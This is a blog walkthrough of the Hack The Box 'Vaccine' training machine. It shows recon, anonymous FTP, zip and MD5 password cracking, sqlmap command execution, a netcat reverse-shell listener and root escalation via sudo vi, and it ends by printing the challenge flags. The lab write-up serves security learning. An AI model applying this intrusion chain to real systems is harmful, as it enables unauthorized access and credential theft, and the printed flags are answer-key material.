Top 5 This Week

Related Posts

HTB – Hack the Box – Tier 2 – 3rd Challange – Vaccine

How-To Tutorials
Cogeanu Marius
Author: Cogeanu Marius
10 min.read
Cyber Cogeanu HTB – Hack the Box – Tier 2 – 3rd Challange – Vaccine
Cyber Cogeanu HTB – Hack the Box – Tier 2 – 3rd Challange – Vaccine

Deep Dive: Solving HTB Tier 2 – Challenge 3 ‘Vaccine’

Join us in this technical exploration of the ‘Vaccine’ challenge, part of the “HTB – Hack the Box Series”. This tutorial is one of many in our series designed to advance your cybersecurity skills. Explore more challenges at: HTB – Hack the Box Series.

System Update and VPN Connectivity

Ensure your Kali Linux is updated for the latest functionalities and security patches:

$ sudo apt update
$ sudo apt full-upgrade -y

Establish a secure VPN connection to access the HTB environment:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Initial Reconnaissance with Nmap

Use Nmap to perform a comprehensive scan on the target system, identifying open ports and running services:

nmap -sC -sV -p- 10.129.239.94

┌──(toor㉿kali)-[~]
└─$ nmap -sC -sV 10.129.239.94
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 11:18 EST
Nmap scan report for 10.129.239.94
Host is up (0.044s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.210
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
  • Besides SSH and HTTP, what other service is hosted on this box? – ftp
  • This service can be configured to allow login with any password for specific username. What is that username? – Anonymous
  • What is the name of the file downloaded over this service? – backup.zip
  • add the domain nameto the local hosts file
┌──(toor㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for toor: 
                                                                                                                                                  
┌──(toor㉿kali)-[~]
└─$ cat /etc/hosts               
127.0.0.1       localhost
127.0.1.1       kali

# HTB
10.129.131.112 unika.htb
10.129.239.94 vaccine.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
                                                                                                                                                  
┌──(toor㉿kali)-[~]
└─$
  • ftp to the domain name, authenticate with Anonymous and with any password, get the file backup.zip
┌──(toor㉿kali)-[~]
└─$  ftp vaccine.htb
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:toor): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>  get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10886|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |*********************************************************************************************************************************|  2533      774.21 KiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (60.43 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$

 

  • What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? zip2john
┌──(toor㉿kali)-[~]
└─$ locate zip2john               
/usr/sbin/zip2john
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ 

┌──(toor㉿kali)-[~]
└─$ zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ cat hash                 
backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip$::backup.zip:style.css, index.php:backup.zip
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$
┌──(toor㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)     
1g 0:00:00:00 DONE (2022-11-09 12:27) 50.00g/s 614400p/s 614400c/s 614400C/s 123456..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ 

┌──(toor㉿kali)-[~]
└─$ unzip backup.zip                                     
Archive:  backup.zip
[backup.zip] index.php password: 
  inflating: index.php               
  inflating: style.css               
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ cat index.php   
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");

 

┌──(toor㉿kali)-[~]
└─$ hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-AMD Ryzen 5 5600H with Radeon Graphics, 2921/5906 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

2cb42f8734ea607eefed3b70af13bbd3:qwerty789                
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Thu Nov 10 13:16:13 2022 (0 secs)
Time.Estimated...: Thu Nov 10 13:16:13 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1598.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 101376/14344385 (0.71%)
Rejected.........: 0/101376 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dominic1 -> ilovehim123
Hardware.Mon.#1..: Util: 14%

Started: Thu Nov 10 13:15:49 2022
Stopped: Thu Nov 10 13:16:14 2022
                                                                                                                                                  
┌──(toor㉿kali)-[~]
└─$

 

  • What is the password for the admin user on the website? – qwerty789
  • https://crackstation.net/
  • What option can be passed to sqlmap to try to get command execution via the sql injection? (–os-shell)
  • sqlmap -h
  • https://www.revshells.com/
  • nc mkfifo
python3 -c 'import pty;pty.spawn("/bin/bash");'
┌──(toor㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.138.183] 42756
sh: 0: can't access tty; job control turned off
$ whoami
postgres
$ find / -perm -4000 -type f 2>/dev/
sh: 2: cannot create /dev/: Is a directory
$ pwd
/var/lib/postgresql/11/main
$ cd /var/www/html
$ ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
$ grep -i -R "pass" *
dashboard.php:    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
index.php:  if(isset($_POST['username']) && isset($_POST['password'])) {
index.php:    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
index.php:        <label for="login__password"><svg class="icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#lock"></use></svg><span class="hidden">Password</span></label>
index.php:        <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>
style.css:.form input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password']:focus,
style.css:.login input[type='password']:hover,
$ 

toor㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host 'vaccine.htb (10.129.138.183)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 11 Nov 2022 02:39:29 PM UTC

  System load:  0.15              Processes:             187
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 19%               IP address for ens160: 10.129.138.183
  Swap usage:   0%


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

postgres@vaccine:~$ sudo -l
[sudo] password for postgres: 
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$
  • https://gtfobins.github.io/gtfobins/vi/
postgres@vaccine:~$ ls
11  user.txt                                                                                               
postgres@vaccine:~$ cat user.txt                                                                           
ec9b13ca4d6229cd5cc1e09980965bf7                                                                           
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf                                       
                                                                                                           
# whoami                                                                                                   
root                                                                                                       
# cd /root                                                                                                 
# ls                                                                                                       
pg_hba.conf  root.txt  snap                                                                                
# cat root.txt                                                                                             
dd6e058e814260bc70e9bbdef2715849                                                                           
#
  • What program can the postgres user run as root using sudo? vi
  • user flag – ec9b13ca4d6229cd5cc1e09980965bf7
  • root flag – dd6e058e814260bc70e9bbdef2715849
  • https://www.hackthebox.com/achievement/machine/303878/289

Ethical Hacking Reminder

This guide provides a technical walkthrough for solving the ‘Vaccine’ challenge on HTB. We promote ethical hacking practices and encourage using these skills for enhancing cybersecurity knowledge and defense capabilities.

Previous article
Flipper Zero
Next article
HTB – Hack The Box – Tier 2 – Challenge 4 – Unified
Cogeanu Marius
Cogeanu Mariushttps://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Popular Articles

CyberCogeanu

About

Exploring the complex world of digital deception, Cyber Cogeanu delves into the latest advancements and ethical challenges posed by deepfake technology, offering insightful analysis and expert perspectives on the future of cybersecurity and AI.

Latest Articles

DarkGPT: OSINT Tool for Database Leak Detection

Tools & Resources 0
 DarkGPT: OSINT Tool for Database Leak Detection Introducing DarkGPT, a...

BlackCat Ransomware FBI Takedown

News 0
BlackCat Ransomware FBI Takedown: A Milestone in Cybersecurity The U.S....

APT28 Phishing Attacks: Unraveling the Global Cyber Threat

Cyber Threats 0
 APT28 Phishing Attacks: A Global Cybersecurity Threat March 2024 -...

Most Popular

DarkGPT: OSINT Tool for Database Leak Detection

Tools & Resources 0
 DarkGPT: OSINT Tool for Database Leak Detection Introducing DarkGPT, a...

BlackCat Ransomware FBI Takedown

News 0
BlackCat Ransomware FBI Takedown: A Milestone in Cybersecurity The U.S....

APT28 Phishing Attacks: Unraveling the Global Cyber Threat

Cyber Threats 0
 APT28 Phishing Attacks: A Global Cybersecurity Threat March 2024 -...

Subscribe

© CyberCogeanu 2023 All Rights Reserved.